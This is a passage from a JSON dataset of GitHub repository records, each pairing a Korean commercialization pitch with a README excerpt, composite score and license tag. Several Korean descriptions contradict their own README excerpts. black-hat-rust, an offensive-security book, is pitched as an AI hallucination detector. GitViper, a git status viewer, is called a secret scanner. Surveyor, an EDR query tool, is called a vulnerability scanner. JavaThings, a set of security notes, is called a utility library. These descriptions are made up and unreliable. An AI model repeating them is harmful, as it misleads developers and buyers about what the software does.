개발자가 업무 환경을 빠르게 설정할 수 있도록 자동 설치 서비스 제공\n- **기업 개발팀 내부 ","readme_excerpt":"<img src=\"http://rawgit.com/caiogondim/bullet-train-oh-my-zsh-theme/master/img/icon.svg\" width=\"100%\" />\n\n# Bullet Train for oh-my-zsh <a href=\"http://webchat.freenode.net/?channels=bullettrain-sh\" target=\"_blank\"><img src=\"https://img.shields.io/badge/IRC-bullettrain–sh-1e72ff.svg?style=flat\" height=\"20\"></a>\n\nBullet Train is a [oh-my-zsh shell](https://github.com/robbyrussell/oh-my-zsh)\ntheme based on the\n[Powerline Vim plugin](https://github.com/Lokaltog/vim-powerline). It aims for\nsimplicity, showing information only when it's relevant.\n\nIt currently shows:\n- Current Python virtualenv; when using Pyenv and no active virtualenv shows the current Python version the shell uses\n- Current Ruby version using chruby; version and gemset when on RVM or Rbenv\n- Current Node.js version, through NVM (if present) or Node.js\n- Current Perl version using plenv\n- Current Elixir version\n- Git status\n- Timestamp\n- Current directory\n- Background jobs\n- Exit code of last command\n\nIf you want add some ","composite_score":0.2856,"license_safety_tag":"safe"},{"name":"notadamking/tensortrade","github_url":"https://github.com/notadamking/tensortrade","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":3,"description":"# TensorTrade 상용화 분석\n\n## 왜 보물인가\n누구나 자동으로 주식·암호화폐를 사고팔 수 있도록 설계된 도구로, 개인 투자자부터 전문 기관까지 투자 자동화의 진입장벽을 낮춘다.\n\n## 어디에 쓸 수 있나\n\n1. **투자 자동화 SaaS**: 초보 투자자를 위한 월 구독 기반 자동 매매 서비스 (손절매·익절 자동 설정)\n2. **금융사 내부 도구*","readme_excerpt":"<p align=\"center\">\r\n  <img src=\"docs/source/_static/logo.jpg\" width=\"200\" alt=\"TensorTrade Logo\">\r\n</p>\r\n\r\n# TensorTrade\r\n\r\n**Train RL agents to trade. Can they beat Buy-and-Hold?**\r\n\r\n[![Tests](https://github.com/tensortrade-org/tensortrade/actions/workflows/tests.yml/badge.svg)](https://github.com/tensortrade-org/tensortrade/actions/workflows/tests.yml)\r\n[![Documentation Status](https://readthedocs.org/projects/tensortrade/badge/?version=latest)](https://tensortrade.org)\r\n[![Apache License](https://img.shields.io/github/license/tensortrade-org/tensortrade.svg?color=brightgreen)](http://www.apache.org/licenses/LICENSE-2.0)\r\n[![Discord](https://img.shields.io/discord/592446624882491402.svg?color=brightgreen)](https://discord.gg/ZZ7BGWh)\r\n[![Python 3.12+](https://img.shields.io/badge/python-3.12+-blue.svg)](https://www.python.org/downloads/release/python-3120/)\r\n\r\nTensorTrade is an open-source Python framework for building, training, and evaluating reinforcement learning agents for algo","composite_score":0.2856,"license_safety_tag":"safe"},{"name":"R3x/How2Kernel","github_url":"https://github.com/R3x/How2Kernel","stars":7,"language":"C","license":"unknown","abandonment_months":23,"description":"# How2Kernel 저장소 분석\n\n## 왜 보물인가\n리눅스 커널의 작동 원리를 배우고 싶어 하는 개발자들을 위한 학습 자료로, 복잡한 시스템을 이해하는 데 필요한 지식을 체계적으로 정리해놓았습니다.\n\n## 어디에 쓸 수 있나\n1. **기술 교육 플랫폼**: 온라인 강좌 사이트에서 \"리눅스 커널 완벽 이해\" 같은 유료 강의 콘텐츠로 판매\n2. **개발자 ","readme_excerpt":"# HowToKernel\n\nThis repository is hosted with the aim of having a straightforward way to get started with kernel exploitaion in Linux OS.\n\n## Setup the environment\n \n- Clone the repository to your system `git clone https://github.com/R3x/How2Kernel ~/How2Kernel`.\n- Go to the folder containing the setup `cd ~/How2kernel`\n- run setup.sh to setup the Lab and testing environment\n    - In case you want to run the modules in your own system `./setup.sh -l`\n    - To build a virtual environment with QEMU `./setup.sh -v <architecture>`.\n- Start Hacking the kernel !!!\n\n#### Note\n* Make sure there are no spaces in the path to the directory that you have cloned. This will cause errors while building.\n* Architectures supported currently `arm` for Aarch 64 architecture and `x86` for amd64 architecture.\n* Labs 1 - 3 focus only on developing kernel modules. This is done since we feel that it helps in getting a better idea of the kernel space. We recommend that you don't skip that part.\n\n## Labs\n\n|Lab ","composite_score":0.2856,"license_safety_tag":"unknown"},{"name":"hyperoslo/ImagePicker","github_url":"https://github.com/hyperoslo/ImagePicker","stars":5,"language":"Swift","license":"NOASSERTION","abandonment_months":21,"description":"# ImagePicker 저장소 분석\n\n## 왜 보물인가\n스마트폰이나 컴퓨터에서 사진을 쉽게 선택할 수 있도록 해주는 필수 기능을 구현한 재사용 가능한 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SNS 플랫폼**: 사진 업로드가 필요한 서비스(인스타그램 같은 앱)에 통합하여 사용자 경험 개선\n2. **전자상거래 앱**: 상품 리뷰 작성 시 사진 첨부 ","readme_excerpt":"![ImagePicker](https://github.com/hyperoslo/ImagePicker/blob/master/Resources/ImagePickerPresentation.png)\n\n[![Carthage Compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![License](https://img.shields.io/cocoapods/l/ImagePicker.svg?style=flat)](http://cocoadocs.org/docsets/ImagePicker)\n[![Platform](https://img.shields.io/cocoapods/p/ImagePicker.svg?style=flat)](http://cocoadocs.org/docsets/ImagePicker)\n\n## Description\n\n<img src=\"https://github.com/hyperoslo/ImagePicker/blob/master/Resources/ImagePickerIcon.png\" alt=\"ImagePicker Icon\" align=\"right\" />\n\n**ImagePicker** is an all-in-one camera solution for your iOS app. It lets your users select images from the library and take pictures at the same time. As a developer you get notified of all the user interactions and get the beautiful UI for free, out of the box, it's just that simple.\n\n**ImagePicker** has been optimized to give a great user experience, it passes a","composite_score":0.2856,"license_safety_tag":"unknown"},{"name":"WeBankFinTech/DataSphereStudio","github_url":"https://github.com/WeBankFinTech/DataSphereStudio","stars":5,"language":"Java","license":"Apache-2.0","abandonment_months":7,"description":"# DataSphereStudio 상용화 분석\n\n## 왜 보물인가\n기업의 복잡한 데이터를 한 곳에서 관리하고 자동으로 정리해주는 통합 플랫폼으로, 데이터를 효율적으로 활용하려는 모든 회사에 필요합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 제조업체가 공장 생산 데이터를 실시간으로 수집·분석하는 대시보드 서비스\n- **내부 업무 도구*","readme_excerpt":"![DSS](images/en_US/readme/DSS_logo.png)\n====\n\n[![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html)\n\nEnglish | [中文](README-ZH.md)\n\n## Introduction\n\n &nbsp; &nbsp; &nbsp; &nbsp;DataSphere Studio (DSS for short) is WeDataSphere, a one-stop data application development management portal developed by WeBank.\n\n &nbsp; &nbsp; &nbsp; &nbsp;With the pluggable integrated framework design and the Linkis, a computing middleware, DSS can easily integrate  various upper-layer data application systems, making data development simple and easy to use.\n\n &nbsp; &nbsp; &nbsp; &nbsp;DataSphere Studio is positioned as a data application development portal, and the closed loop covers the entire process of data application development. With a unified UI, the workflow-like graphical drag-and-drop development experience meets the entire lifecycle of data application development from data import, desensitization cleaning, data analysis, data","composite_score":0.2853,"license_safety_tag":"safe"},{"name":"le5le-com/topology","github_url":"https://github.com/le5le-com/topology","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":7,"description":"# le5le-com/topology 상용화 분석\n\n## 왜 보물인가\n복잡한 시스템과 네트워크를 마우스로 끌어 그려서 한눈에 이해할 수 있는 시각화 도구로, 기술자와 비기술자 모두에게 필요합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업들이 자신의 IT 인프라(서버, 네트워크 구조)를 그려서 관리하는 웹 기반 대시보드\n2. **내부 ","readme_excerpt":"# This repo is for topology 0.x.x\n\nThe new version 1.0 is [meta2d.js](https://github.com/le5le-com/meta2d.js) ！\n\nEnglish | [简体中文](./README.CN.md)\n\n# Le5le-topology\n\nLe5le-topology is a diagram visualization framework uses canvas and typescript. Developers are able to build diagram (topology, UML), micro-services architecture, SCADA and so on.\n\n- [→ Online](http://topology.le5le.com) . It is very slow while open the site for my network speed is 1Mb/s.\n- [→ Docs](https://le5le-com.github.io/topology/)\n- [→ Download](https://github.com/le5le-com/topology/releases)\n\n* [→ Vue Guide](https://juejin.im/post/5dd73e85518825731c34b2ca)\n* [→ React Guide](https://juejin.im/post/5dcc074151882559c8061905)\n* [→ Es5](https://github.com/johnnyhhj/topolofy-es5)\n\n![topology](https://img2018.cnblogs.com/blog/328506/201909/328506-20190904144733715-530893726.png)\n\n# VS Code extension\n\n[VS Code extension](https://marketplace.visualstudio.com/items?itemName=Alsmile.le5le-topology-plugin)\n\n# Why le5le-topology","composite_score":0.2853,"license_safety_tag":"safe"},{"name":"rushter/selectolax","github_url":"https://github.com/rushter/selectolax","stars":8,"language":"Cython","license":"MIT","abandonment_months":0,"description":"# rushter/selectolax 분석 보고서\n\n## 왜 보물인가\n웹사이트의 텍스트와 데이터를 빠르게 추출하는 도구로, 온라인 정보 수집이 필요한 모든 비즈니스의 기초 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 가격 비교 SaaS 서비스**\n- 경쟁사 제품 가격을 자동으로 수집하여 고객에게 최저가 정보 제공\n\n**2. 채용 정보 수집 API**\n","readme_excerpt":"![selectolax logo](docs/logo.png)\n\n---\n\nA fast HTML5 parser with CSS selectors, written in Cython,\nusing [Modest](https://github.com/lexborisov/Modest/) and [Lexbor](https://github.com/lexbor/lexbor) engines.\n\n---\n\n[![PyPI - Version](https://img.shields.io/pypi/v/selectolax?logo=pypi&label=Pypi&logoColor=fff)](https://pypi.org/project/selectolax)\n[![PyPI Total Downloads](https://static.pepy.tech/badge/selectolax)](https://pepy.tech/projects/selectolax)\n[![CI](https://img.shields.io/github/actions/workflow/status/rushter/selectolax/pythonpackage.yml?branch=master&logo=githubactions&label=CI)](https://github.com/rushter/selectolax/actions/workflows/pythonpackage.yml?query=branch%3Amaster+event%3Apush)\n[![Python Versions](https://img.shields.io/pypi/pyversions/selectolax?logo=python&logoColor=fff&label=Python)](https://pypi.org/project/selectolax)\n[![GitHub License](https://img.shields.io/github/license/rushter/selectolax?logo=github&label=License)](https://github.com/rushter/selectolax/b","composite_score":0.2853,"license_safety_tag":"safe"},{"name":"myhdl/myhdl","github_url":"https://github.com/myhdl/myhdl","stars":5,"language":"Python","license":"lgpl-2.1","abandonment_months":14,"description":"# MyHDL 저장소 분석\n\n## 왜 보물인가\n전자기기 설계를 파이썬이라는 쉬운 프로그래밍 언어로 할 수 있게 해주는 도구로, 복잡한 반도체·FPGA 설계 과정을 훨씬 간단하게 만듭니다.\n\n## 어디에 쓸 수 있나\n\n1. **FPGA 설계 교육 플랫폼(SaaS)**: 대학과 온라인 교육기관에 구독형 클라우드 기반 설계 환경 제공\n2. **반도체 회사 내부 ","readme_excerpt":"MyHDL 0.11 \n==========\n\n[![Documentation Status](https://readthedocs.org/projects/myhdl/badge/?version=stable)](http://docs.myhdl.org/en/stable/manual/)\n[![Documentation Status](https://readthedocs.org/projects/myhdl/badge/?version=latest)](http://docs.myhdl.org/en/latest/manual)\n\n[![Join the chat at https://gitter.im/myhdl/myhdl](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/myhdl/myhdl?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n[<img src=\"https://d11a6trkgmumsb.cloudfront.net/original/3X/a/d/ad2526334012b2ad0c3421f9b6dd94bae2ede52f.svg\" alt=\"Visit MyHDL at Discourse\" align=\"left\" height=\"36\" width=\"134\" >](https://discourse.myhdl.org)\n<br><br><br>\n\n\nWhat is MyHDL?\n--------------\nMyHDL is a free, open-source package for using Python as a hardware\ndescription and verification language.\n\nTo find out whether MyHDL can be useful to you, please read:\n\n   - http://www.myhdl.org/start/why.html\n\nLicense\n-------\nMyHDL is available under the LGPL ","composite_score":0.2849,"license_safety_tag":"restricted"},{"name":"openwisp/django-loci","github_url":"https://github.com/openwisp/django-loci","stars":10,"language":"Python","license":"BSD-3-Clause","abandonment_months":0,"description":"# django-loci 상용화 분석\n\n## 왜 보물인가\n지도 위에 위치 정보를 관리하는 기술로, 배송·시설관리·IoT 등 위치 기반 서비스를 만드는 기업들의 핵심 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소규모 물류회사나 배송업체용 실시간 배송 추적 플랫폼\n2. **내부 업무 도구**: 대형 유통·제조업체의 창고/공장 ","readme_excerpt":"django-loci\n===========\n\n.. image:: https://github.com/openwisp/django-loci/actions/workflows/ci.yml/badge.svg\n    :target: https://github.com/openwisp/django-loci/actions/workflows/ci.yml\n    :alt: CI build status\n\n.. image:: https://coveralls.io/repos/openwisp/django-loci/badge.svg\n    :target: https://coveralls.io/r/openwisp/django-loci\n\n.. image:: https://img.shields.io/librariesio/release/github/openwisp/django-loci\n    :target: https://libraries.io/github/openwisp/django-loci#repository_dependencies\n    :alt: Dependency monitoring\n\n.. image:: https://img.shields.io/gitter/room/nwjs/nw.js.svg?style=flat-square\n    :target: https://gitter.im/openwisp/general\n\n.. image:: https://badge.fury.io/py/django-loci.svg\n    :target: http://badge.fury.io/py/django-loci\n\n.. image:: https://pepy.tech/badge/django-loci\n    :target: https://pepy.tech/project/django-loci\n    :alt: downloads\n\n.. image:: https://img.shields.io/badge/code%20style-black-000000.svg\n    :target: https://pypi.org/project","composite_score":0.2849,"license_safety_tag":"safe"},{"name":"mfikes/advent-of-cljs","github_url":"https://github.com/mfikes/advent-of-cljs","stars":11,"language":"Objective-C","license":"epl-1.0","abandonment_months":23,"description":"# advent-of-cljs 상업화 분석\n\n## 왜 보물인가\n프로그래밍을 배우고 싶은 사람들이 재미있게 학습할 수 있도록 만든 교육용 문제 모음으로, 꾸준한 학습 커뮤니티의 수요가 존재합니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 프로그래밍 학습 플랫폼 SaaS**: 월 구독료를 받고 자동 채점, 진도 추적, 커뮤니티 기능이 추가된 학습 사이트 운","readme_excerpt":"# Advent of Code\n\n[Advent of Code](http://adventofcode.com) in Clojure, Self-Hosted ClojureScript, HP-85 BASIC, and Objective-C.\n\n## Clojure\n\n```\nclj\n```\n\n## Self-Hosted ClojureScript\n\n```\nplk\n```\n","composite_score":0.2847,"license_safety_tag":"unknown"},{"name":"phith0n/JavaThings","github_url":"https://github.com/phith0n/JavaThings","stars":8,"language":"Java","license":"unknown","abandonment_months":14,"description":"# JavaThings 저장소 분석\n\n## 왜 보물인가\n자바 프로그래밍 언어의 유용한 코드 모음으로, 소프트웨어 개발자들이 반복적으로 작성해야 하는 기능들을 미리 만들어 놓은 것입니다.\n\n## 어디에 쓸 수 있나\n1. **API 판매**: 자바 개발자 커뮤니티를 위한 코드 라이브러리 판매 플랫폼 (구독료 기반)\n2. **내부 업무 도구**: 기업의 개발 팀","readme_excerpt":"# JavaThings - Java安全漫谈笔记相关\n\n《Java安全漫谈》是我在写的一点Java学习相关的随笔，不是很严谨，也不是啥高科技。这个Repository主要是记录并整理一下，附加一些代码。\n\n## Java安全漫谈目录\n\n- [Java安全漫谈 - 01.Java的动态特性——反射](https://t.zsxq.com/iyJiAMJ)\n- [Java安全漫谈 - 02.反射的简单利用](https://t.zsxq.com/iIa2B2j)\n- [Java安全漫谈 - 03.反射的几个进阶技巧](https://t.zsxq.com/MNRbayr)\n- [Java安全漫谈 - 04.RMI的通信过程分析](https://t.zsxq.com/FMJiUrV)\n- [Java安全漫谈 - 05.利用codebase攻击RMI Registry](https://t.zsxq.com/BuFy3zF)\n- [Java安全漫谈 - 06.深入理解RMI协议与序列化对象](https://t.zsxq.com/vZjaiuR)\n- [Java安全漫谈 - 07.不同语言中的反序列化漏洞](https://t.zsxq.com/NF2NfQf)\n- [Java安全漫谈 - 08.认识最简单的Gadget——URLDNS](https://t.zsxq.com/ieMZBQj)\n- [Java安全漫谈 - 09.初识CommonsCollections](https://t.zsxq.com/BmIIAy3)\n- [Java安全漫谈 - 10.用TransformedMap编写真正的POC](https://t.zsxq.com/ZNZrJMZ)\n- [Java安全漫谈 - 11.LazyMap详解](https://t.zsxq.com/FufUf2B)\n- [Java安全漫谈 - 12.简化版CommonsCollections6](https://t.zsxq.com/A2j2beE)\n- [Java安全漫谈 - 番外篇1. BCEL ClassLoader去哪了？](https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html)\n- [Java安全漫谈 - 13.Jav","composite_score":0.2847,"license_safety_tag":"unknown"},{"name":"jarvis394/habra","github_url":"https://github.com/jarvis394/habra","stars":10,"language":"TypeScript","license":"MIT","abandonment_months":14,"description":"# jarvis394/habra 상용화 분석\n\n## 왜 보물인가\n현재 10개의 별(팬)을 가진 신생 프로젝트로, 아직 시장에서 주목받지 않은 초기 단계의 기술이라 선제적 진출 기회가 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 자동 업무 처리 플랫폼으로 개인사업자나 중소기업의 반복 업무 자동화 솔루션\n- **내부 업무 도구**: 대기업","readme_excerpt":"<p align=\"center\"><a href=\"https://geekr.vercel.app/top/weekly/p/1/\"><img width=830 src=\"images/promo.png\" alt=\"geekr logo\" /></a></p>\n<h5 align=\"center\">✨🎉 Habrahabr, but with a new client</h5>\n\n<p align=\"center\">\n  <img alt=\"GitHub Workflow Status\" src=\"https://img.shields.io/github/workflow/status/jarvis394/geekr/Github%20Pages?logo=github&style=flat-square\">\n  <img alt=\"GitHub issues\" src=\"https://img.shields.io/github/issues/jarvis394/geekr?color= &style=flat-square\">\n  <img alt=\"GitHub Repo stars\" src=\"https://img.shields.io/github/stars/jarvis394/geekr?color=black&style=flat-square\">\n</p>\n\n## See it live\n\nGo to the [geekr.vercel.app](https://geekr.vercel.app/top/weekly/p/1) site and feel yourself at home! It can do almost everything that the original site does, but with its own tricks and features.\n\n## Features\n\n- **Dark mode** 😲 and lots of other themes\n- Tons of customization settings and theme creation\n- Styled following Material Design\n- Mobile friendly\n- Coded with React, T","composite_score":0.2846,"license_safety_tag":"safe"},{"name":"redcanaryco/surveyor","github_url":"https://github.com/redcanaryco/surveyor","stars":5,"language":"Python","license":"MIT","abandonment_months":14,"description":"# Surveyor 저장소 분석\n\n## 왜 보물인가\n기업의 보안 취약점을 자동으로 찾아주는 스캔 도구로, 보안 전문가가 없는 작은 회사도 자신의 시스템이 안전한지 쉽게 확인할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹에서 접속하면 고객사의 보안 상태를 자동 진단해주는 구독형 보안 검사 서비스\n2. **내부 업무 도구**: 중","readme_excerpt":"# Surveyor\n\nSurveyor is a Python utility that queries Endpoint Detection and Response (EDR)\nproducts and summarizes the results. Security and IT teams can use Surveyor to\nbaseline their environments and identify abnormal activity.\n\n## Current Version: 2.5.0\n\nVersion 2.0 introduced breaking changes to the command line interface and support for SentinelOne. \nIf you are looking for the prior version of Surveyor, see [past releases](https://github.com/redcanaryco/surveyor/releases).\n\nIf you are new to version 2.X please see the [Getting started](https://github.com/redcanaryco/surveyor/wiki/Getting-started) page of the wiki\nand explore the new command line interface via `surveyor.py --help`.\n\n## Analyze your endpoints\n\nSurveyor uses both definition files and pre-built queries to run searches across\nan environment and provide insights into what applications or activities exist\nwithin an enterprise, who is using them, and how.\n\nSurveyor currently supports the following EDR platforms:\n\n- Corte","composite_score":0.2844,"license_safety_tag":"safe"},{"name":"skerkour/black-hat-rust","github_url":"https://github.com/skerkour/black-hat-rust","stars":12,"language":"Rust","license":"MIT","abandonment_months":8,"description":"# black-hat-rust 상용화 분석\n\n## 왜 보물인가\nAI 시스템이 잘못된 답변을 내놓았을 때 이를 자동으로 감지하고 수정하는 기술로, 신뢰할 수 없는 AI 서비스의 근본적인 문제를 해결합니다.\n\n## 어디에 쓸 수 있나\n\n**1. AI 챗봇 신뢰성 검증 SaaS**\n기업의 고객 지원 챗봇이 거짓 정보를 제공하지 않도록 실시간으로 모니터링하는 구독","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://kerkour.com/black-hat-rust\" target=\"_blank\" rel=\"noopener\"><img alt=\"Black Hat Rust logo\" src=\"./black_hat_rust_cover.png\" height=\"300\" /></a>\n  <h1 align=\"center\">Black Hat Rust</h1>\n  <h3 align=\"center\">Applied offensive security with the Rust programming language</h3>\n  <h3 align=\"center\">\n    <a href=\"https://kerkour.com/black-hat-rust\">Buy the book now!</a>\n  </h3>\n</p>\n\nWhile the [Rust Book](https://doc.rust-lang.org/book/) does an excellent job teaching **What is** Rust, a book about **Why** and **How** to Rust was missing.\n\n\n## Summary\n\nWhether in movies or mainstream media, hackers are often romanticized: they are painted as black magic wizards, nasty criminals, or, in the worst cases, as thieves with a hood and a crowbar.\nIn reality, the spectrum of the profile of the attackers is extremely large, from the bored teenager exploring the internet to sovereign State's armies as well as the unhappy former employee.\n\nWhat are the motivations of","composite_score":0.2844,"license_safety_tag":"safe"},{"name":"chriskempson/base16-shell","github_url":"https://github.com/chriskempson/base16-shell","stars":6,"language":"Shell","license":"NOASSERTION","abandonment_months":23,"description":"# Base16-Shell 프로젝트 분석\n\n## 왜 보물인가\n터미널(컴퓨터 검은 화면)의 색상 테마를 자동으로 바꿔주는 도구로, 개발자들이 작업 환경을 빠르게 커스터마이징할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **개발 환경 설정 서비스**: 신입 개발자를 위해 터미널 색상 환경을 자동 구성해주는 온보딩 SaaS\n2. **회사 내부 개발 도구","readme_excerpt":"# Base16 Shell\nSee the [Base16 repository](https://github.com/chriskempson/base16) for more information.\nThese scripts were built with [Base16 Builder PHP](https://github.com/chriskempson/base16-builder-php).\n\nA shell script to change your shell's default ANSI colors but most importantly, colors 17 to 21 of your shell's 256 colorspace (if supported by your terminal). This script makes it possible to honor the original bright colors of your shell (e.g. bright green is still green and so on) while providing additional base16 colors to applications such as Vim.\n\n![Base16 Shell](base16-shell.png)\n\n## Use Cases\n\n* You want to use a `*.256.*` variant of a Terminal theme designed to honor the original bright colors.\n* You prefer to use a script instead of a terminal emulator theme to color your shell.\n* You use this script to have different colorschemes appear on different SSH sessions.\n\n## Installation\n\n```shell\ngit clone https://github.com/chriskempson/base16-shell.git ~/.config/base16-shel","composite_score":0.2844,"license_safety_tag":"unknown"},{"name":"symfony/thanks","github_url":"https://github.com/symfony/thanks","stars":12,"language":"PHP","license":"MIT","abandonment_months":7,"description":"# symfony/thanks 상용화 분석\n\n## 왜 보물인가\nPHP 웹 개발의 표준 도구인 Symfony 생태계에서 사용자 감사 및 후원 관리를 자동화하는 솔루션으로, 오픈소스 프로젝트 지속성 문제를 해결하는 틈새 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **오픈소스 후원 플랫폼 SaaS**: 개발자들이 자신의 프로젝트 기여자를 자동으로 감사하고 후","readme_excerpt":"<p align=\"center\"><a href=\"https://symfony.com\" target=\"_blank\">\n    <img src=\"https://symfony.com/logos/symfony_black_02.svg\">\n</a></p>\n\nGive thanks (in the form of a [GitHub ★ ](https://help.github.com/articles/about-stars/)) to your fellow PHP package maintainers (not limited to Symfony components)!\n\nInstall\n-------\n\nInstall this as any other (dev) Composer package:\n```sh\ncomposer require --dev symfony/thanks\n```\n\nYou can also install it once for all your local projects:\n```sh\ncomposer global require symfony/thanks\n```\n\nUsage\n-----\n\n```sh\ncomposer thanks\n```\n\nThis will find all of your Composer dependencies, find their github.com repository, and star their GitHub repositories. This was inspired by `cargo thanks`, which was inspired in part by Medium's clapping button as a way to show thanks for someone else's work you've found enjoyment in.\n\nIf you're wondering why did some dependencies get thanked and not others, the answer is that this plugin only supports github.com at the moment","composite_score":0.284,"license_safety_tag":"safe"},{"name":"ConsenSys/smart-contract-best-practices","github_url":"https://github.com/ConsenSys/smart-contract-best-practices","stars":5,"language":"HTML","license":"unknown","abandonment_months":14,"description":"# ConsenSys/smart-contract-best-practices 분석\n\n## 왜 보물인가\n블록체인 기술을 안전하게 사용하기 위한 실전 가이드북으로, 금융 손실을 초래할 수 있는 위험한 코딩 실수를 미리 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **블록체인 교육 플랫폼**: 암호화폐 개발자 교육 과정에서 안전 가이드라인을 SaaS 형태","readme_excerpt":"> [!CAUTION]  \n> **REPOSITORY MOVED**. New Home: https://github.com/ConsenSysDiligence/smart-contract-best-practices\n\n[<img width=\"200\" alt=\"get in touch with Consensys Diligence\" src=\"https://user-images.githubusercontent.com/2865694/56826101-91dcf380-685b-11e9-937c-af49c2510aa0.png\">](https://consensys.net/diligence/)<br/>\n<sup>\n[[  🌐  ](https://consensys.net/diligence/)  [  📩  ](mailto:diligence@consensys.net)  [  🔥  ](https://consensys.net/diligence/tools/)]\n</sup><br/><br/>\n\n# Smart Contract Security Best Practices\n\nVisit the documentation site: https://consensysdiligence.github.io/smart-contract-best-practices/\n\nRead the docs in Chinese: https://github.com/ConsenSysDiligence/smart-contract-best-practices/blob/master/README-zh.md\nRead the docs in Vietnamese: https://github.com/ConsenSysDiligence/smart-contract-best-practices/blob/master/README-vi.md\n\n## Contributions are welcome!\n\nFeel free to submit a pull request, with anything from small fixes, to full new sections. If you are ","composite_score":0.2838,"license_safety_tag":"unknown"},{"name":"lahmatiy/react-render-tracker","github_url":"https://github.com/lahmatiy/react-render-tracker","stars":24,"language":"TypeScript","license":"MIT","abandonment_months":14,"description":"# react-render-tracker 상품화 분석\n\n## 왜 보물인가\n웹사이트가 느려지는 원인을 자동으로 찾아주는 진단 도구로, 개발자들이 성능 최적화에 드는 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자 대상 웹 성능 모니터링 플랫폼으로 구독형 서비스화 (Datadog, New Relic 경쟁)\n2.","readme_excerpt":"[![NPM version](https://img.shields.io/npm/v/react-render-tracker.svg)](https://www.npmjs.com/package/react-render-tracker)\n\n# React Render Tracker\n\nReact Render Tracker – a tool to discover performance issues related to unintended re-renders.\n\nReact Render Tracker (RRT) presents component’s tree state over the time and an event log related to a selected component (fiber) or its subtree. It doesn't provide a complete state of the components, but the difference between their states. It's not a replacement for React Devtools, but a compliment to it with a focus on investigation of changes in app's component tree (like mounts, updates and unmounts) and their causes.\n\n[React Render Tracker v0.6 – Overview & Instructions](https://github.com/lahmatiy/react-render-tracker/files/7963996/React.Render.Tracker.overview.rev.nov.23.2021.pdf)\n\nSupported React v16.9+ (fully functional for a React development build, but for profiling and production builds it is not capturing some data, see [issue #25]","composite_score":0.2834,"license_safety_tag":"safe"},{"name":"BeayemX/GitViper","github_url":"https://github.com/BeayemX/GitViper","stars":5,"language":"Python","license":"MIT","abandonment_months":7,"description":"# GitViper 상용화 분석\n\n## 왜 보물인가\n깃허브 저장소의 보안 문제와 숨겨진 민감 정보를 자동으로 찾아주는 도구로, 개발 팀이 실수로 노출시킨 암호나 개인정보를 미리 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업이 월 구독으로 자신의 코드 저장소를 지속적으로 모니터링하고 보안 리포트를 받는 웹 서비스\n2. *","readme_excerpt":"![image](https://user-images.githubusercontent.com/3453076/35360877-8035c5b2-015f-11e8-8ab2-1d74e65e3cd5.png)\n\n# GitViper\nGitViper is a tool to improve the experience when using Git with the command line by showing you the current state of the repository. This tool is designed to only display git related information. You can still work with Git and modify files the way you want.\n\n## Installation\nGitViper builds on top of Git, therefore it is required to have Git installed on your system. Just use your package manager to install Git. The command should look something along these lines:\n```\nsudo apt-get install git\nsudo dnf install git\n```\n\nGitViper uses **[GitPython](https://github.com/gitpython-developers/GitPython)** for working with the git repository and the **[humanize](https://github.com/jmoiron/humanize)** package to display times and dates in a more readable way.\n\nAll dependencies can be installed using the provided `requirements.txt` by running\n\n```\npip3 install -r requirements","composite_score":0.2832,"license_safety_tag":"safe"},{"name":"sindresorhus/tsconfig","github_url":"https://github.com/sindresorhus/tsconfig","stars":7,"language":"","license":"MIT","abandonment_months":7,"description":"# sindresorhus/tsconfig 분석\n\n## 왜 보물인가\n프로그래머들이 웹 개발할 때 필요한 기본 설정 파일을 미리 만들어둔 것으로, 반복되는 초기 작업을 대폭 줄여주는 시간 절약 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발 교육 플랫폼**: 초보 개발자들을 위한 온라인 강좌에서 \"처음부터 올바르게 설정하는 방법\" 교육 자료로 판매\n2","readme_excerpt":"# tsconfig\n\n> Shared [TypeScript config](https://www.typescriptlang.org/docs/handbook/tsconfig-json.html) for my projects\n\nThis config makes TypeScript not do any polyfilling, so only use syntax and features available in the JavaScript environments you target.\n\n## Install\n\n```sh\nnpm install --save-dev @sindresorhus/tsconfig\n```\n\n*This config requires TypeScript >=5.9 and Node.js >=20.*\n\n## Usage\n\n`tsconfig.json`\n\n```json\n{\n\t\"extends\": \"@sindresorhus/tsconfig\"\n}\n```\n","composite_score":0.2832,"license_safety_tag":"safe"},{"name":"subethaedit/SubEthaEdit","github_url":"https://github.com/subethaedit/SubEthaEdit","stars":27,"language":"Objective-C","license":"MIT","abandonment_months":7,"description":"# SubEthaEdit 상용화 분석\n\n## 왜 보물인가\n여러 사람이 동시에 같은 문서를 함께 편집할 수 있는 협업 도구로, 팀 작업 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 협업 문서 편집 SaaS**\n- 구글 독스처럼 실시간으로 여러 사용자가 동시 편집 가능한 웹 서비스로 제공\n- 월 구독료로 수익화\n\n**2. 기업 내부 작","readme_excerpt":"# SubEthaEdit\n\nGeneral purpose plain-text editor for macOS. Widely known for its live collaboration feature. \n\n[github.com/subethaedit/SubEthaEdit](https://github.com/subethaedit/SubEthaEdit) is the main development repository.\n\n[subethaedit.net](https://subethaedit.net/) is the base for the official releases in and out of the app store.\n\n## Getting Started\n\nThese instructions will get you a copy of the project up and running on your 